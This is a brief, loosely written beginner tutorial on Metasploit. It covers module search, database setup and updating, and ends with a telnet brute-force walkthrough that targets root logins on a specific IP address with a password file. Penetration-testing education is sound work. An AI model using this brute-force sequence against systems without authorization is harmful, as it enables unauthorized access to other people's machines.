In this tutorial we are going to learn about metasploit
What is Metasploit ??
- It has a good command called “Search”
- For example, I want to find exploits related to Microsoft and the command can be
- msf >search name:Microsoft type:exploit
- Another command is “info”.
- It provides the information regarding a module or platform where it is used, who is the author, vulnerability reference, and the payload restriction that this can have
- #service postgresql start
- #msfdb init
- #msfdb start
- if you use help or ? symbol, it will show you a list with the commands of MSP along with their description.
- Another important administration command is msfupdatewhich helps to update the metasploit with the latest vulnerability exploits.
- After running this command in the console, you will have to wait several minutes until the update is complete.
Now i am gona show you how to use metasplot on telnet
- >use auxiliary/scanner/telnet_login
- >show options
- >set rhosts 126.96.36.199
- >Set rport 23
- >set username root
- >set pass_file pass.txt
This is all what is metasploit and how to use metasploit.